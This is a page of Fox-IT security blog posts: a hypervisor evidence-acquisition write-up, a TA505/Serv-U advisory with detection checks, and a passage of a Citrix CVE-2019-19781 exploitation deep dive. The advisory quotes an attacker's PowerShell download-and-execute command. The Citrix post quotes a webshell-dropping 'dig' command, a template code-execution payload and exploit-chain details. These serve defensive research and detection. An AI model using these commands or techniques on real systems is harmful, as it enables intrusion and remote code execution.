Normal view

There are new articles available, click to refresh the page.
Before yesterdayFox-IT

I’m in your hypervisor, collecting your evidence

By: Fox IT
18 October 2022 at 15:01

Authored by Erik Schamper

Data acquisition during incident response engagements is always a big exercise, both for us and our clients. It’s rarely smooth sailing, and we usually encounter a hiccup or two. Fox-IT’s approach to enterprise scale incident response for the past few years has been to collect small forensic artefact packages using our internal data collection utility, “acquire”, usually deployed using the clients’ preferred method of software deployment. While this method works fine in most cases, we often encounter scenarios where deploying our software is tricky or downright impossible. For example, the client may not have appropriate software deployment methods or has fallen victim to ransomware, leaving the infrastructure in a state where mass software deployment has become impossible.

Many businesses have moved to the cloud, but most of our clients still have an on-premises infrastructure, usually in the form of virtual environments. The entire on-premises infrastructure might be running on a handful of physical machines, yet still restricted by the software deployment methods available within the virtual network. It feels like that should be easier, right? The entire infrastructure is running on one or two physical machines, can’t we just collect data straight from there?

Turns out we can.

Setting the stage

Most of our clients who run virtualized environments use either VMware ESXi or Microsoft Hyper-V, with a slight bias towards ESXi. Hyper-V was considered the “easy” one between these two, so let’s first focus our attention towards ESXi.

VMware ESXi is one of the more popular virtualization platforms. Without going into too much premature detail on how everything works, it’s important to know that there are two primary components that make up an ESXi configuration: the hypervisor that runs virtual machines, and the datastore that stores all the files for virtual machines, like virtual disks. These datastores can be local storage or, more commonly, some form of network attached storage. ESXi datastores use VMware’s proprietary VMFS filesystem.

There are several challenges that we need to overcome to make this possible. What those challenges are depends on which concessions we’re willing to make with regards to ease of use and flexibility. I’m not one to back down from a challenge and not one to take unnecessary shortcuts that may come back to haunt me. Am I making this unnecessarily hard for myself? Perhaps. Will it pay off? Definitely.

The end goal is obvious, we want to be able to perform data acquisition on ideally live running virtual machines. Our internal data collection utility, “Acquire”, will play a key part in this. Acquire itself isn’t anything special, really. It builds on top of the Dissect framework, which is where all its power and flexibility comes from. Acquire itself is really nothing more than a small script that utilizes Dissect to read some files from a target and write it to someplace else. Ideally, we can utilize all this same tooling at the end of this.

The first attempts

So why not just run Acquire on the virtual machine files from an ESXi shell? Unfortunately, ESXi locks access to all virtual machine files while that virtual machine is running. You’d have to create full clones of every virtual machine you’d want to acquire, which takes up a lot of time and resources. This may be fine in small environments but becomes troublesome in environments with thousands of virtual machines or limited storage. We need some sort of offline access to these files.

We’ve already successfully done this in the past. However, those times took considerably more effort, time and resources and had their own set of issues. We would take a separate physical machine or virtual machine that was directly connected to the SAN where the ESXi datastores are located. We’d then use the open-source vmfs-tools or vmfs6-tools to gain access to the files on these datastores. Using this method, we’re bypassing any file locks that ESXi or VMFS may impose on us, and we can run acquire on the virtual disks without any issues.

Well, almost without any issues. Unfortunately, vmfs-tools and vmfs6-tools aren’t exactly proper VMFS implementations and routinely cause errors or data corruption. Any incident responder using vmfs-tools and vmfs6-tools will run into those issues sooner or later and will have to find a way to deal with them in the context of their investigation. This method also requires a lot of manual effort, resources and coordination. Far from an ideal “fire and forget” data collection solution.

Next steps

We know that acquiring data directly from the datastore is possible, it’s just that our methods of accessing these datastores is very cumbersome. Can’t we somehow do all of this directly from an ESXi shell?

When using local or iSCSI network storage, ESXi also exposes the block devices of those datastores. While ESXi may put a lock on the files on a datastore, we can still read the on-device filesystem data just fine through these block devices. You can also run arbitrary executables on ESXi through its shell (except when using the execInstalledOnly configuration, or can you…? 😉), so this opens some possibilities to run acquisition software directly from the hypervisor.

Remember I said I liked a challenge? So far, everything has been relatively straightforward. We can just incorporate vmfs-tools into acquire and call it a day. Acquire and Dissect are pure Python, though, and incorporating some C library could overcomplicate things. We also mentioned the data corruption in vmfs-tools, which is something we ideally avoid. So what’s the next logical step? If you guessed “do it yourself” you are correct!

You got something to prove?

While vmfs-tools works for the most part, it lacks a lot of “correctness” with regards to the implementation. Much respect to anyone who has worked on these tools over the years, but it leaves a lot on the table as far as a reference implementation goes. For our purposes we have some higher requirements on the correctness of a filesystem implementation, so it’s worth spending some time working on one ourselves.

As part of an upcoming engagement, there just so happened to be some time available to work on this project. I open my trusty IDA Pro and get to work reverse engineering VMFS. I use vmfs-tools as a reference to get an idea of the structure of the filesystem, while reverse engineering everything else completely from scratch.

Simultaneously I work on reconstructing an ESXi system from its “offline” state. With Dissect, our preferred approach is to always work from the cleanest slate possible, even when dealing with a live system . For ESXi, this means that we don’t utilize anything from the “live” system, but instead will reconstruct this “live” state within Dissect ourselves from however ESXi stores its files when it’s turned off. This can cause an initial higher effort but pays of in the end because we can then interface with ESXi in any possible way with the same codebase: live by reading the block devices, or offline from reading a disk image.

This also brought its own set of implementation and reverse engineering challenges, which include:

  • Writing a FAT16 implementation, which ESXi uses for its bootbank filesystem.
  • Writing a vmtar implementation, a slightly customized tar file that is used for storing OS files (akin to VIBs).
  • Writing an Envelope implementation, a file encryption format that is used to encrypt system configuration on supported systems.
  • Figuring out how ESXi mounts and symlinks its “live” filesystem together.
  • Writing parsers for the various configuration file formats within ESXi.

After two weeks it’s time for the first trial run for this engagement. There are some initial missed edge cases, but a few quick iterations later and we’ve just performed our first live evidence acquisition through the hypervisor!

A short excursion to Hyper-V

Now that we’ve achieved our goal on ESXi, let’s take a quick look to see what we need to do to achieve the same on Hyper-V. I mentioned earlier that Hyper-V was the easy one, and it really was. Hyper-V is just an extension of Windows, and we already know how to deal with Windows in Dissect and Acquire. We only need to figure out how to get and interpret information about virtual machines and we’re off to the races.

Hyper-V uses VHD or VHDX as its virtual disks. We already support that in Dissect, so nothing to do there. We need some metadata on where these virtual disks are located, as well as which virtual disks belong to a virtual machine. This is important, because we want a complete picture of a system for data acquisition. Not only to collect all filesystem artefacts (e.g. MFT or UsnJrnl of all filesystems), but also because important artefacts, like the Windows event logs, may be configured to store data on a different filesystem. We also want to know where to find all the registered virtual machines, so that no manual steps are required to run Acquire on all of them.

A little bit of research shows that information about virtual machines was historically stored in XML files, but any recent version of Hyper-V uses VMCX files, a proprietary file format. Never easy! For comparison, VMware stores this virtual machine metadata in a plaintext VMX file. Information about which virtual machines are present is stored in another VMCX file, located at C:\ProgramData\Microsoft\Windows\Hyper-V\data.vmcx. Before we’re able to progress, we must parse these VMCX files.

Nothing our trusty IDA Pro can’t solve! A few hours later we have a fully featured parser and can easily extract the necessary information out of these VMCX files. Just add a few lines of code in Dissect to interpret this information and we have fully automated virtual machine acquisition capabilities for Hyper-V!


The end result of all this work is that we can add a new capability to our Dissect toolbelt: hypervisor data acquisition. As a bonus, we can now also easily perform investigations on hypervisor systems with the same toolset!

There are of course some limitations to these methods, most of which are related to how the storage is configured. At the time of writing, our approach only works on local or iSCSI-based storage. Usage of vSAN or NFS are currently unsupported. Thankfully most of our clients use these supported methods, and research into improvements obviously never stops.

We initially mentioned scale and ease of deployment as a primary motivator, but other important factors are stealth and preservation of evidence. These seem to be often overlooked by recent trends in DFIR, but they’re still very important factors for us at Fox-IT. Especially when dealing with advanced threat actors, you want to be as stealthy as possible. Assuming your hypervisor isn’t compromised (😉), it doesn’t get much stealthier than performing data acquisition from the virtualization layer, while still maintaining some sense of scalability. This also achieves the ultimate preservation of evidence. Any new file you introduce or piece of software you execute contaminates your evidence, while also risking rollovers of evidence.

The last takeaway we want to mention is just how relatively easy all of this was. Sure, there was a lot of reverse engineering and writing filesystem implementations, but those are auxiliary tasks that you would have to perform regardless of the end goal. The important detail is that we only had to add a few lines of code to Dissect to have it all just… work. The immense flexibility of Dissect allows us to easily add “complex” capabilities like these with ease. All our analysts can continue to use the same tools they’re already used to, and we can employ all our existing analysis capabilities on these new platforms.

In the time between when this blog was written and published, Mandiant released excellent blog posts[1][2] about malware targeting VMware ESXi, highlighting the importance of hypervisor forensics and incident response. We will also dive deeper into this topic with future blog posts.


TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial access

By: Fox IT
8 November 2021 at 16:30

NCC Group’s global Cyber Incident Response Team have observed an increase in Clop ransomware victims in the past weeks. The surge can be traced back to a vulnerability in SolarWinds Serv-U that is being abused by the TA505 threat actor. TA505 is a known cybercrime threat actor, who is known for extortion attacks using the Clop ransomware. We believe exploiting such vulnerabilities is a recent initial access technique for TA505, deviating from the actor’s usual phishing-based approach.

NCC Group strongly advises updating systems running SolarWinds Serv-U software to the most recent version (at minimum version 15.2.3 HF2) and checking whether exploitation has happened as detailed below.

We are sharing this information as a call to action for organisations using SolarWinds Serv-U software and incident responders currently dealing with Clop ransomware.

Modus Operandi

Initial Access

During multiple incident response investigations, NCC Group found that a vulnerable version of SolarWinds Serv-U server appeared to be the initial access used by TA505 to breach its victims’ IT infrastructure. The vulnerability being exploited is known as CVE-2021-35211 [1].

SolarWinds published a security advisory [2] detailing the vulnerability in the Serv-U software on July 9, 2021. The advisory mentions that Serv-U Managed File Transfer and Serv-U Secure FTP are affected by the vulnerability. On July 13, 2021, Microsoft published an article [3] on CVE-2021-35211 being abused by a Chinese threat actor referred to as DEV-0322. Here we describe how TA505, a completely different threat actor, is exploiting that vulnerability.

Successful exploitation of the vulnerability, as described by Microsoft [3], causes Serv-U to spawn a subprocess controlled by the adversary. That enables the adversary to run commands and deploy tools for further penetration into the victim’s network. Exploitation also causes Serv-U to log an exception, as described in the mitigations section below


We observed that Base64 encoded PowerShell commands were executed shortly after the Serv-U exceptions indicating exploitation were logged. The PowerShell commands ultimately led to deployment of Cobalt Strike Beacons on the system running the vulnerable Serv-U software. The PowerShell command observed deploying Cobalt Strike can be seen below: powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘hxxp://IP:PORT/a’))


On several occasions the threat actor tried to maintain its foothold by hijacking a scheduled tasks named RegIdleBackup and abusing the COM handler associated with it to execute malicious code, leading to FlawedGrace RAT.

The RegIdleBackup task is a legitimate task that is stored in \Microsoft\Windows\Registry. The task is normally used to regularly backup the registry hives. By default, the CLSID in the COM handler is set to: {CA767AA8-9157-4604-B64B-40747123D5F2}. In all cases where we observed the threat actor abusing the task for persistence, the COM handler was altered to a different CLSID.

CLSID objects are stored in registry in HKLM\SOFTWARE\Classes\CLSID\. In our investigations the task included a suspicious CLSID, which subsequently redirected to another CLSID. The second CLSID included three objects containing the FlawedGrace RAT loader. The objects contain Base64 encoded strings that ultimately lead to the executable.

Checks for potential compromise

Check for exploitation of Serv-U

NCC Group recommends looking for potentially vulnerable Serv-U FTP-servers in your network and check these logs for traces of similar exceptions as suggested by the SolarWinds security advisory. It is important to note that the publications by Microsoft and SolarWinds are describing follow-up activity regarding a completely different threat actor than we observed in our investigations.

Microsoft’s article [3] on CVE-2021-35211 provides guidance on the detection of the abuse of the vulnerability. The first indicator of compromise for the exploitation of this vulnerability are suspicious entries in a Serv-U log file named DebugSocketlog.txt. This log file is usually located in the Serv-U installation folder. Looking at this log file it contains exceptions at the time of exploitation of CVE-2021-35211. NCC Group’s analysts encountered the following exceptions during their investigations:

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();

However, as mentioned in Microsoft’s article, this exception is not by definition an indicator of successful exploitation and therefore further analysis should be carried out to determine potential compromise.

Check for suspicious PowerShell commands

Analysts should look for suspicious PowerShell commands being executed close to the date and time of the exceptions. The full content of PowerShell commands is usually recorded in Event ID 4104 in the Windows Event logs.

Check for RegIdleBackup task abuse

Analysts should look for the RegIdleBackup task with an altered CLSID. Subsequently, the suspicious CLSID should be used to query the registry and check for objects containing Base64 encoded strings. The following PowerShell commands assist in checking for the existence of the hijacked task and suspicious CLSID content.

Check for altered RegIdleBackup task

Export-ScheduledTask -TaskName “RegIdleBackup” -TaskPath “\Microsoft\Windows\Registry\” | Select-String -NotMatch “<ClassId>{CA767AA8-9157-4604-B64B-40747123D5F2}</ClassId>”

Check for suspicious CLSID registry key content


Summary of checks

The following steps should be taken to check whether exploitation led to a suspected compromise by TA505:

  • Check if your Serv-U version is vulnerable
  • Locate the Serv-U’s DebugSocketlog.txt
  • Search for entries such as ‘EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();’ in this log file
  • Check for Event ID 4104 in the Windows Event logs surrounding the date/time of the exception and look for suspicious PowerShell commands
  • Check for the presence of a hijacked Scheduled Task named RegIdleBackup using the provided PowerShell command
    • In case of abuse: the CLSID in the COM handler should NOT be set to {CA767AA8-9157-4604-B64B-40747123D5F2}
  • If the task includes a different CLSID: check the content of the CLSID objects in the registry using the provided PowerShell command, returned Base64 encoded strings can be an indicator of compromise.

Vulnerability Landscape

There are currently still many vulnerable internet-accessible Serv-U servers online around the world.

In July 2021 after Microsoft published about the exploitation of Serv-U FTP servers by DEV-0322, NCC Group mapped the internet for vulnerable servers to gauge the potential impact of this vulnerability. In July, 5945 (~94%) of all Serv-U (S)FTP services identified on port 22 were potentially vulnerable. In October, three months after SolarWinds released their patch, the number of potentially vulnerable servers is still significant at 2784 (66.5%).

The top countries with potentially vulnerable Serv-U FTP services at the time of writing are:

Amount  Country 
1141  China 
549  United States 
99  Canada 
92  Russia 
88  Hong Kong 
81  Germany 
65  Austria 
61  France 
57  Italy 
50  Taiwan 
36  Sweden 
31  Spain 
30  Vietnam 
29  Netherlands 
28  South Korea 
27  United Kingdom 
26  India 
21  Ukraine 
18  Brazil 
17  Denmark 

Top vulnerable versions identified: 

Amount  Version 
441  SSH-2.0-Serv-U_15.1.6.25 
236  SSH-2.0-Serv-U_15.0.0.0 
222  SSH-2.0-Serv-U_15.0.1.20 
179  SSH-2.0-Serv-U_15.1.5.10 
175  SSH-2.0-Serv-U_14.0.1.0 
143  SSH-2.0-Serv-U_15.1.3.3 
138  SSH-2.0-Serv-U_15.1.7.162 
102  SSH-2.0-Serv-U_15.1.1.108 
88  SSH-2.0-Serv-U_15.1.0.480 
85  SSH-2.0-Serv-U_15.1.2.189 

MITRE ATT&CK mapping

Tactic  Technique  Procedure 
Initial Access  T1190 – Exploit Public Facing Application(s)  TA505 exploited CVE-2021-35211 to gain remote code execution. 
Execution  T1059.001 – Command and Scripting Interpreter: PowerShell  TA505 used Base64 encoded PowerShell commands to download and run Cobalt Strike Beacons on target systems. 
Persistence  T1053.005 – Scheduled Task/Job: Scheduled Task  TA505 hijacked a scheduled task named RegIdleBackup and abused the COM handler associated with it to execute malicious code and gain persistence. 
Defense Evasion  T1112 – Modify Registry  TA505 altered the registry so that the RegIdleBackup scheduled task executed the FlawedGrace RAT loader, which was stored as Base64 encoded strings in the registry. 





A Second Look at CVE-2019-19781 (Citrix NetScaler / ADC)

By: Fox IT
1 July 2020 at 03:50

Authors: Rich Warren of NCC Group FSAS & Yun Zheng Hu of Fox-IT, in close collaboration with Fox-IT’s RIFT.

About the Research and Intelligence Fusion Team (RIFT):

RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.


In this blog post we will revisit CVE-2019-19781, a Remote Code Execution vulnerability affecting Citrix NetScaler / ADC. We will explore how this issue has been widely abused by various actors and how a hacker turf war led to some actors “adversary patching” the vulnerability in order to prevent secondary compromise by competing adversaries – hiding the true number of vulnerable and compromised devices in the wild.

Following this, we will take a deep-dive into the vulnerability itself and present a previously unpublished technique which can be used to exploit CVE-2019-19781, without any vulnerable Perl file – bypassing the “adversary patching” techniques used by some attackers.

We will also provide statistics on exploitation, patching and backdoors we have identified in the wild.

Public Exploitation & Backdoors

Back in January 2020, shortly before the first public exploits for CVE-2019-19781 were released, Fox-IT built and deployed a number of honeypots in order to keep an eye on exploitation attempts by malicious actors. Additionally, we developed our own in-house exploit in order to study and understand the vulnerability, as well as to use it on our Red Team engagements.

On 10th January 2020, the first public exploits were released on GitHub. Shortly after this we started to see a significant uptick in both scanning and exploitation of the vulnerability. Most of the initial exploits weaponised by attackers came in the form of coin-miners, however a number of other “interesting” attacks were also observed within the first few days of exploitation. Typically, these involved a webshell being deployed to the compromised device.

This allowed us to collect a list of backdoors deployed by attackers, and subsequently develop signatures which could be used to identify backdoors as well as specific indicators of compromise. Following this, Fox-IT’s RIFT Team were able to gather statistics around patch adoption and backdoors deployed in the wild.

As an example, the following webshell was observed being dropped as part of a group of backdoors which we refer to as the “Iran Network Team” backdoors, first described in our Reddit live blog on January 13th 2020. It is important to note that although this particular actor used a C2 domain of we have not made any attribution to Iran or any other state actor. At the time however, this particular attacker stood out as distinct from many other attackers, who appeared to be focused on deploying coin-miners.

Instead, this attacker appeared to be concerned with gaining remote persistent access to as many systems as possible, deploying a number of PHP webshells using the Project Zero India public exploit. These webshells would be deployed by issuing a “dig” command such as the following:

exec('dig txt|tee /var/vpn/themes/login.php | tee /netscaler/portal/templates/REDACTED.xml');

This would fetch the webshell content via a TXT record hosted on the C2 domain. The content of which would be written to the following PHP file:

  • /var/vpn/themes/login.php

Variants were also observed, using the “logout.php” file instead, as well as staging payloads via Base64 encoded files named “readme.txt” and “read.txt”.

This PHP file was in fact a simple webshell, which did not require any authentication in order to interact with it, other than knowing the POST parameter name. According to our statistics, this attacker was largely successful in deploying their backdoor to a significant number of systems, many of which, although patched, are left vulnerable due to the password-less backdoor left open on their devices. This backdoor could be used not only by the original attacker, but also by any script-kiddie or state actor with knowledge of the webshell path and POST parameter name.

As well as backdoors, we were also able to identify specific exploitation artifacts. For example, when studying the “Iran Network Team” attacks, we noticed that the attacker would commonly stage secondary payloads within the public directory of the server, meaning that their presence could be easily detected.

Once the signatures for each backdoor variant were developed, analysis of the available data was carried out. This initially included 5 different known backdoors and artifacts and was done using data from late January 2020. This provided some interesting results, some of which are detailed below.

In January 2020 a total of 1030 compromised servers were identified. The majority of these compromised devices were situated in the US, with a total of 2057 backdoors and artifacts being identified. Many of these compromised devices included Governmental organizations and Fortune 500 companies. There appeared to be no specific sector that was targeted more than any other, however backdoors were observed on high-profile organisations from a number of industries including manufacturing, media, telecoms, healthcare, financial and technology.


Backdoors – Count by Country

However, of perhaps more concern was that, of these compromised devices, 54% had been patched against CVE-2019-19781, thus providing their administrators with a false sense of security. This is because although the devices were indeed patched, any backdoor installed by an attacker prior to this would not have been removed by simply installing the vendor’s patch.

Note that the Unknown hosts recorded below indicate hosts that did not respond with an expected HTTP request (e.g. a 403 or a 200)

Backdoored Servers – Patch Status

From Malware to Palware

Following the initial discovery of public exploitation of this vulnerability, the team at FireEye released their analysis of a new backdoor, named “NOTROBIN’, written in Golang.  What was different about this backdoor however, was that instead of deploying a coin-miner or a simple webshell, NOTROBIN would actually attempt to identify and remove any backdoors that had been installed prior to it, as well as attempt to block further exploitation by deleting new XML files or scripts that did not contain a per-infection secret key.

This marked a shift, at least for one actor, to a new type of infection, which DCSO eloquently described as “palware” – a seemingly innocent piece of malware with the primary goal of preventing other actors from deploying their own malware.

But was the actor behind NOTROBIN the only one to deploy this “palware” method? Possibly not. A number of anecdotal cases, as well as our own first-hand experience suggest that other attackers have also carried out “adversary patching” by deleting the vulnerable Perl scripts (such as from compromised devices, thus preventing other attackers from exploiting the same issue, whilst maintaining access for themselves.

Whether or not this is in fact a separate actor, or actually a quirk of NOTROBIN’s backdoor removal function however, is not so clear. As mentioned earlier, one of the features of NOTROBIN’s backdoor removal function (aptly named remove_bds), is to remove any file within the /netscaler/portal/scripts/directory which has been recently modified and does not contain NOTROBIN’s secret key within either the filename or the contents. Of course this would include any backdoor that had been dropped by a previous attacker, however if one of the built-in scripts such as had been modified, perhaps as the result of a backdoor being added, this would also result in the removal of that file by NOTROBIN. This means that not only that the backdoor would be removed, but that the entire script, and all its legitimate functionality would be wiped out with it.

We have also responded on incident response cases where the “vulnerable” Perl files such as have been renamed to contain the NOTROBIN key, e.g.:


Effectively making the vulnerability only exploitable by an actor with prior knowledge of the infection key.

As a result, there are hosts, which on the surface appear to be patched, however have in fact been compromised by a previous attacker, and the “vulnerable” Perl files removed or renamed.

During the remainder of this blog post, we will discuss the inner workings of the Citrix vulnerability and exploit. We will then demonstrate a new exploitation technique which would allow an attacker to bypass both NOTROBIN’s patching method, as well as enable exploitation of a device that has had the vulnerable Perl scripts removed.

Vulnerability Deep Dive

Before we get into the details of bypassing the “adversary patch”, we will spend some time refreshing ourselves with what the vulnerability was, and how it is exploited.

TL;DR Version

Essentially, exploitation of this issue can be broken down into two steps which we will discuss in detail later. A short summary is given below:

  • Step 1: An HTTP request is made to a “vulnerable” Perl file. The attacker may or may not need to use directory traversal within the URL in order to access the Perl file, depending on whether the request is being made to a management or virtual IP interface. An HTTP header is supplied containing a directory traversal string to an XML file, which is to be written to disk. Note: A “vulnerable” Perl file is considered to be any Perl file which calls the `UserPrefs::csd` function followed by the `UserPrefs::filewrite` This is important, and typical of all public exploits.
  • Step 2: A follow-up HTTP request is then made, causing the crafted XML file to be rendered by the template engine, resulting in arbitrary code-execution.

Of course, we’ve skipped some steps here to simplify things, but the important thing to remember is the following limitations of this exploitation method:

  1. A “vulnerable” Perl file must exist on the system (which is certainly the case by default, however another attacker or a well-meaning administrator may have removed it)
  2. Two HTTP requests are required in order to achieve code execution.

Detailed Exploitation Steps

In order to fully understand the steps detailed above, let’s look at how the vulnerability works in detail, and explain why these steps are necessary. This should help us later to understand how to bypass the limitations.

If you are already familiar with the inner workings of the exploit you can skip over this next section.

For a good background on exploitation of this issue, please check out the MDSec blog post, which explains in great detail the vulnerability and exploitation steps. However for the sake of completeness (and to highlight a few specific things) we will explain it here too.

The CVE-2019-19781 “vulnerability” is in fact the CVE used to record the mitigation steps for a number of vulnerabilities which could be exploited together to achieve unauthenticated remote code execution. Citrix later released a patch to remediate the majority of these vulnerabilities used as part of the exploit chain.

Directory Traversal

The first of the vulnerabilities was a path canonicalisation issue which allowed requests to the Virtual IP (VIP) interface to bypass certain access control measures, if the request contained a directory traversal string. This essentially allowed an unauthenticated user to invoke Perl scripts which were not intended to be exposed via the public interface. This included Perl scripts within the /vpns/portal/scripts/directory, thus exposing any underlying vulnerabilities which might exist within the Perl scripts contained in this directory.

So, now the attacker is able to access certain Perl scripts within the “scripts” directory. However, another vulnerability is needed to turn that unintended access into arbitrary file write, and eventual code execution.

Controlled File Write

The next issue, a partially controlled file-write, existed within the module. Specifically, within the csd function, which takes the value of the NSC_USER header supplied within the request and sets it as the $username variable. This username value is then later used to build the $self-&gt;{filename} instance variable without any form of sanitisation on the supplied value.

As shown in the following screenshots, the username value is taken directly from the HTTP header, before being concatenated with some predefined values to form the filename variable.

csd Function


User-controlled Filename

However, this alone does not lead to an exploitable condition. All it does is set a variable. We need to cause this value to be used for something useful. Given the name of the filename variable, we can make a pretty good guess at what it’s used for, and lo-and-behold there is indeed a function named file<strong>write, also contained within the module.

filewrite Function

This function takes the username value, and again uses it to build a path to write out an XML file to the filesystem (note that it reconstructs the path from username again). The contents of this file are controlled via the $doc variable, which depending on when it is called, contains various user-controlled data.

So filewrite can be tricked into writing an XML file to an arbitrary location via a directory traversal in the HTTP header, but how do we trigger a call to filewrite, and how do we control the contents?

Well, as UserPrefs is a Perl module we cannot simply execute it directly via the URL traversal. Instead we need to find and invoke a Perl script, which makes use of the vulnerable functionality. For that we need to find a Perl file which:

  1. Is invokable as an unauthenticated user (i.e. contained in the `/vpns/portal/scripts` directory)
  2. Calls both `csd` and `filewrite` from the `` module

As discussed in many blog posts and tweets, as well as used in a number of public exploits, the script fits this requirement.

First it instantiates a UserPrefs object (called $user), before calling the csd function on the $user object (remember, this allows us to control the filename via the NSC_USER header). It subsequently accepts some data provided by the user in the request, including a url, title and desc parameter. These parameters are set as instance variables of the $doc object and passed to the filewrite function, where the data is serialised to an XML file on disk. This means that we can now control the path of where the XML file is written, as well as some limited content, via the name, url or desc parameters.

Call to csd function:

Call to csd Function

User supplied data added to $newBM variable:

User-controlled Values

User controlled properties assigned to $doc before calling filewrite:

Values Passed to filewrite Function

Now we have a semi-controlled file-write where we can write an XML file anywhere on disk and control some of the content, however we need a way to leverage this to achieve code execution. This is where the Template Toolkit component comes into play.

Perl Code Execution

When a request is received by the Citrix server, the request is handled according to the Apache httpd.conf configuration, which contains a large number of complex redirect rules which ship off the request to a particular component depending on the request properties, such as the request path. Requests to the /vpns/portal/ path are handled by the Perl module via the PerlResponseHandler mod_perl directive in the httpd.conf file.


Among other things (which we will explain later, or maybe some eagle-eyed readers may spot it in the screenshot), the Handler module simply takes the path specified within the request, forms a path to the requested file, and renders it via the Template Toolkit template engine.

Handler Function

This means that if we write our XML file to the templates directory, and inject template directives via the url, title or desc parameters, we can later cause the XML file to be rendered as a template using a follow-up HTTP request. Perfect!

However, there is one last hurdle. Although the Template Toolkit can allow code execution via template directives such as PERL and RAWPERL, these are disabled in the configuration used on the Citrix server. However, it was discovered that this same functionality could be achieved by abusing the global template object, which is exposed to all templates, to create a new BLOCK containing arbitrary Perl code, via a call to the method. This allows the attacker to execute their code using a template directive such as the following:

[%{ 'BLOCK' => 'print STDERR "ace.\n"; die' }) %]

Further details regarding this “feature” can be found in the GitHub issue.

Note that @0x09AL also identified another method to execute code via the DATAFILE plugin. This is also explained in the MDSec blog post.



Exploit Summary

So putting it all together, we need to:

  1. Make a request to the pl file with a directory traversal within the `NSC_USER` header, causing an XML file to be written to the templates directory.
  2. Inject a template directive into the dropped XML file, containing Perl code to be executed
  3. Make another request to the `/vpns/portal/<file>.xml` file in order to cause to render it via the template engine.

The above steps are the same as those carried out in the “Project Zero India” public exploit as well as the one subsequently released by TrustedSec shortly afterwards. It was also the same technique we and others had used in their own exploits. This resulted in some people (us included) believing that the following constraints could be relied upon for detection:

  1. The attacker must make two requests. First a POST request to write the XML file. Second, a GET request to render the XML file.
  2. The first request would be to the `` file
  3. The first request would contain an `NSC_USER` header containing a traversal string

Flawed Assumptions

Two days after the public exploits were released, @mpgn_x64 discovered that in fact any Perl file which called the csd function could be exploited, regardless of whether user-provided data was added to the written XML file.

@mpgn_x64 Tweet
Example using (Step 1)
Example using (Step 2)


This is possible because when the csd function is called, it eventually calls filewrite if the file does not already exist. This can be seen within the file. When csd is called, it internally calls fileread on line 61:

Call to fileread Function

The fileread function checks if the specified file (constructed via $username value, taken from the NSC_USER header), exists or not.

User-controlled Values in fileread

If the file does not exist, then the initdoc function is called, which creates the XML file passing the $username value:

initdoc Function

Additionally, aside from the user controlled values (such as url, title, and desc used in, the filewrite function would also write the username within the XML file, which as we showed before, is controlled via the NSC_USER header. So, if we request a “vulnerable” .pl file with an NSC_USER value that contains the target XML file to be written, but also a template injection string we can exploit the issue without controlling any other values in the XML file!

After this we simply need to request the XML file, causing it to be rendered via the template engine, ensuring that we encode any non-URL safe characters within the template/path appropriately.

This dispelled the first myth – exploitation could in fact take place against any .pl file calling the csd function. This included the following files:


Exploitation of this Method in the Wild

Shortly after this information was published, we started to see the first usage of this new exploitation technique deployed in the wild. This log extract shows some hits that were received in our Citrix honeypots, mostly from TOR exit nodes, starting from January 24th. Interestingly, these requests would write out a Perl backdoor line by line to a file named /netscaler/portal/scripts/ This backdoor simply checked if the MD5 hash of the supplied password parameter matched a hardcoded value, and if so, would execute the command provided within the HTTP request.

The decoded webshell code is shown below. This appears to be a modified version of the PerlKit webshell. this gist on GitHub

The details of this webshell were shared with our contacts at FireEye, who added detection to their IOC scanner script. Later the same month, further attacks were observed in the wild, distributing the same backdoor, in what appeared to be large distribution, non-targeted attacks. Just like with the Iran Network Team attacks, we are unable to provide any specific attribution due to limited visibility of post-exploitation activity.

Some more Quirks

To compound matters further, @superevr discovered that due to the way that the Citrix HTTP server handles requests, the exploit does not require a POST request followed by a GET request, and could be exploited with varying request methods. In fact the request method itself did not matter at all, and could be exploited even with a non-existent request method. The HTTP version number itself could also be meddled with, further frustrating efforts to detect exploitation attempts. Thanks to efforts by both the community and FireEye, detection methods were improved to take account for these “quirks”.

Refining the Exploit Further

Now we know that exploitation of this issue was not simply confined to one specific “vulnerable” .pl file, and that attackers are constantly evolving their attack techniques in order to overcome our assumptions of constraints of specific vulnerability exploitation, i.e. “how a well-behaving HTTP server should work. What other assumptions can we challenge? Well, in the next section we will show how we discovered that the issue can in fact be exploited:

  • With only a single HTTP Request
  • Without any “vulnerable” Perl file existing on the server
  • With only non-Perl files (.e.g. ping.html)
  • Without any existing file at all

In fact, this method can be used to exploit a vulnerable server even if an attacker has deleted all of the Perl files contained within the “scripts” directory – thus bypassing any “palware” patch that involves removing the vulnerable Perl scripts from the server. And best of all, the “exploit” fits in fewer than 280 characters.

To explain how this works, we need to take a step back and remember how the (and similar) exploits worked. You will recall that they all rely on the csd and filewrite functions being called, hence the need for a “vulnerable” .pl file. However, the csd function is also called outside of these Perl files.

If we take a look again at the module we can see that the csd function is actually called automatically whenever the Handler is invoked, which includes any time a file is served via the /portal/templates/* path. This means that whenever a request is made for a file within the templates directory (via a request to /vpns/portal/&lt;file&gt; which maps via the httpd.conf to the templates directory), the vulnerable code-path will be hit automatically, even if the requested file is an HTML or XML file, for example. The following screenshot highlights where the csd function is called within

As demonstrated by @mpgn_x64, all that is required for the exploit to succeed is a single call to the csd function (which itself calls filewrite), where we place both a template injection and directory traversal within the NSC_USER header. Therefore, putting this together, we can hit the vulnerable code without using any of the built-in Perl scripts. Requesting an existing file such as /vpns/portal/ping.html with a crafted NSC_USER header is enough to cause the XML file to be written to disk. An example request is shown below:

Dropping XML Payload with ping.html

Once the XML file has been written, we can then follow up with a request for the XML file, resulting in our code being executed:

Triggering Code Execution

So now we can exploit the issue without any vulnerable Perl file existing on the target server! But can we do better? Can the issue be exploited with only a single HTTP request to a non-existent file? Let’s take another look at the module.

On line 19, the csd function is called. As discussed, this causes our target XML file to be written to the templates directory:

Call to csd Function

Afterwards, on line 32 the requested file is rendered as a template:

Template Rendering

